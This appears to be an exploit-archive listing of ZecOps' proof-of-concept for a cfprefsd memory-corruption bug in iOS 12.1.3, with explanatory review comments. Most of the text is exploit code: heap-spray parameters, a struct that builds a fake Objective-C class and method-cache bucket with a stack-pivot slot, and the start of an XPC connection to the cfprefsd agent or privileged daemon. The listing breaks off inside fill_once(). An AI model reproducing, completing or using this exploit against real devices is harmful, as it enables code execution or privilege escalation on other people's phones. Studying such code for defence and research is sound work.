iOS 12.1.3 cfprefsd Memory Corruption

iOS version 12.1.3 cfprefsd memory corruption exploit.


MD5 | 5f2945567a2b5f4158fe44116484e39d

// (c) 2019 ZecOps, Inc. - https://www.zecops.com - Find Attackers' Mistakes
// Intended for educational and defensive purposes only.
// Use at your own risk.

#include <xpc/xpc.h>
#import <pthread.h>
#include <mach/mach.h>
#include <mach/task.h>
#include <dlfcn.h>
#include <mach-o/dyld_images.h>
#include <objc/runtime.h>

// Build switch for which cfprefsd endpoint fill_once() connects to:
// nonzero -> "com.apple.cfprefsd.agent", zero -> "com.apple.cfprefsd.daemon"
// (the daemon variant passes XPC_CONNECTION_MACH_SERVICE_PRIVILEGED).
#define AGENT 1

// Spray tuning parameters. Their consumers are outside this excerpt;
// presumably FILL_DICT_COUNT/FILL_COUNT/FREE_COUNT are iteration counts and
// FILL_SIZE the allocation size class being targeted — confirm against the
// spray loop. Note FILL_SIZE is not sizeof(struct heap_spray) on either
// pointer width, so the two are tuned independently.
#define FILL_DICT_COUNT 0x600
#define FILL_COUNT 0x1000
#define FREE_COUNT 0x2000
#define FILL_SIZE (0xc0)

// Global stop flag. Nothing in this excerpt reads or writes it; given that
// <pthread.h> is included it is presumably polled from worker threads.
// NOTE(review): if it is shared across threads it should be an _Atomic int
// (a plain int gives no ordering or visibility guarantee) — confirm usage.
int need_stop = 0;

// In-memory layout of the object this proof-of-concept places in the
// target process's heap (presumably from fill_once() and the FILL_* loops,
// whose bodies are outside this excerpt). Field names record what each slot
// is meant to hold; the offsets are tied to the iOS 12.1.3 build named in
// the header and are not expected to hold on any other build.
// NOTE(review): the 32-bit register names (r4/r5/r6/r10) and uint32_t slots
// sit next to void* members, so every offset in this struct changes with the
// pointer width of the build — looks like it assumes a 32-bit target; confirm.
struct heap_spray {
    void* fake_objc_class_ptr;       // first word, named as a fake Objective-C class pointer
    uint32_t r10;
    uint32_t r4;
    void* fake_sel_addr;
    uint32_t r5;
    uint32_t r6;
    uint64_t cmd;
    uint8_t pad1[0x3c];              // filler so stack_pivot lands at the intended offset
    uint32_t stack_pivot;
    // Mimics the parts of an objc_class the runtime consults for its
    // method cache (names only; layout assumed from the target build).
    struct fake_objc_class_t {
        char pad[0x8];
        void* cache_buckets_ptr;
        uint32_t cache_bucket_mask;
    } fake_objc_class;
    // Mimics one method-cache bucket: selector and implementation pointer.
    struct fake_cache_bucket_t {
        void* cached_sel;
        void* cached_function;
    } fake_cache_bucket;
    char command[32];                // inline string buffer; consumer not visible here
};

void fill_once(){

#if AGENT
xpc_connection_t client = xpc_connection_create_mach_service("com.apple.cfprefsd.agent",0,0);
#else
xpc_connection_t client = xpc_connection_create_mach_service("com.apple.cfprefsd.daemon",0,XPC_CONNECTION_MACH_SERVICE_PRIVILEGED);